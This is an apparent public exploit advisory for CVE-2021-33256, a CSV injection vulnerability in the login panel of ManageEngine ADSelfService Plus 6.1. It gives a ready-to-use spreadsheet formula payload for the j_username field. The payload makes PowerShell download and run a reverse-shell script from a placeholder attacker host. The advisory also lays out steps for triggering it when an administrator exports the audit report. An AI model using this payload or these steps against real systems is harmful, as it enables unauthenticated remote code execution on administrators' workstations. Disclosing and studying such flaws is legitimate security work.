ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

# Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. j_username parameter seems to vulnerable and reverse shell could be obtained if privileged user exports "User Attempts Audit Report" as CSV file.

=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0

# Proof Of Concept

1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the above payload.

=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'

And the request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12

j_username parameter value is saved to "User Name" column which is start of line in the CSV file:

2- Powershell command that sends reverse shell to attacker machine is embeded to last line of theInvoke-PowershellTcp.ps1 file.

3- If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user.

NVD - CVE-2021-33256nvd.nist.gov

ManageEngine ADSelfService Plus 6.1 - CSV InjectionExploit Database

# Reference

CSV Injection | OWASP Foundationowasp.org

nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishangGitHub